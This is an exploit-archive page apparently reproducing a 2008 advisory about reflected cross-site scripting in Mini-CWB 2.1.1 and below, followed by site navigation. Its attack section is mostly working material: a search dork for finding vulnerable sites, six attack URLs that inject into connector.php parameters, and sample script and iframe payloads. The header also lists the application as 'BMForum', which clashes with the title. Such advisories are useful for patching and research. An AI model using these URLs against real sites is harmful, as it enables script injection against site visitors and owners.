minicwb-xss.txt

minicwb-xss.txt: Posted May 27, 2008; Authored by CWH Underground | Site citecclub.org; Mini-CWB versions 2.1.1 and below suffer form a remote cross site scripting vulnerability.; tags | exploit, remote, xss; SHA-256 | d79c78d03d1411698c2295ed318b649d889462bd0605322e79c0be285b6add76; Download | Favorite | View

minicwb-xss.txt

==========================================================
      Mini-CWB <= 2.1.1 Remote XSS Vulnerability             
==========================================================


AUTHOR : CWH Underground
DATE   : 25 May 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : BMForum
 VERSION     : <= 2.1.1 (Lastest Version)
 VENDOR      : http://www.mini-open-cms.com
 DOWNLOAD    : http://www.mini-open-cms.com/download/Mini-CWB-2.1.1.zip
#####################################################

DORK: "powered by mini-cwb"

---Multiple XSS Exploit in 'connector.php'---

[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext=<XSS>
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_GET=<XSS>
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_POST=<XSS>
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_SESSION=<XSS>
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_SERVER=<XSS>
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS>


Example for XSS : 
  <script>alert(123);</script>
  <iframe src=http://www.google.com>                                .

################################################################
 Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
################################################################

Top Authors In Last 30 Days

Red Hat 249 files
Jay Turla 150 files
indoushka 147 files
Ubuntu 62 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,071)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,733)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,808)
UNIX (9,452)
UnixWare (188)
Windows (6,763)
Other

minicwb-xss.txt

minicwb-xss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

minicwb-xss.txt

Share This

minicwb-xss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems